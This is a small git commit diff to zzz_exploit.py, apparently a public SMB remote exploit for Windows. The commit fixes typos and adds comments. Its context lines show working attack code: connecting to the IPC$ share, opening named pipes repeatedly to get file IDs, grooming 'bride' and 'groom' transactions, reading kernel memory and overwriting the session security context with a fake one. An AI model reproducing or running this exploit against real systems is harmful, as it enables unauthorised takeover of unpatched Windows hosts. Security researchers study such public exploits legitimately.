typo and some comment

2017-06-22 22:16:20 +07:00
parent df6ff967cb
commit acaa27cc80
2 changed files with 6 additions and 4 deletions
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -26,7 +26,7 @@ USERNAME = ''
 PASSWORD = ''

 '''
-Reverse from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
+Reversed from: SrvAllocateSecurityContext() and SrvImpersonateSecurityContext()
 win7 x64
 struct SrvSecContext {
 	DWORD xx1; // second WORD is size
@@ -293,6 +293,7 @@ def exploit(target, pipe_name):
 	for i in range(10):
 		tid = conn.tree_connect_andx('\\\\'+target+'\\'+'IPC$')
 		conn.set_default_tid(tid)
+		# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
 		fid = conn.nt_create_andx(tid, pipe_name)
 		if not FRAG_POOL_SIZE:
 			leak_frag_size(conn, tid, fid)
@@ -315,7 +316,7 @@ def exploit(target, pipe_name):
 	shift_indata_byte = 0x200
 	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)

-	# Note: Even the distance between bride transaction is exact what we want, the groom transaction might be in a wrong place.
+	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
 	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
 	indata_value = info['next_page_addr'] + 0x100 + 0x10 + 0x1000 + shift_indata_byte  # maxParameterCount (0x1000)
 	indata_next_trans_displacement = info['trans2_addr'] - indata_value
@@ -375,6 +376,7 @@ def exploit(target, pipe_name):
 	secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])

 	print('overwriting session security context')
+	# see FAKE_SECCTX detail at top of the file
 	write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])

 	# ================================